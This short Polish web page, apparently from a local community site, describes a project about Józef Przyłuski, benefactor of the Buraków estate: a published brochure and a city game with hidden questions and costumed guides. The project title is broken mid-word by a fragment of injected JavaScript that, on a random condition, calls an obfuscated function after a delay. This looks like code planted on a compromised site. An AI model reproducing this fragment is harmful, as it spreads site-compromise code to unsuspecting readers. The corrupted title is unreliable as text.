Przyłuski

Podczas realizacji projektu „Architekci naszej rzeczywisdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości” – Józef Przyłuski, dobrodziej Burakowa wykonano dwa zasadnicze działania:

  1. Wydano broszurę Buraków-Wrzosów i jego założyciel

  2. Przeprowadzono Grę miejską na terenie osiedla Buraków
    Gra miejska polegała na udzieleniu prawidłowych odpowiedzi na pytania ukryte w różnych miejscach Burakowa. Każdy z uczestników otrzymywał mapę, na której były zaznaczone miejsca ukrycia pytań. Uczestnicy mogli zdobyć dodatkowe pytania (i udzielić na nie odpowiedzi) od różnych osób przebranych w stylu epoki Józefa Przyłuskiego.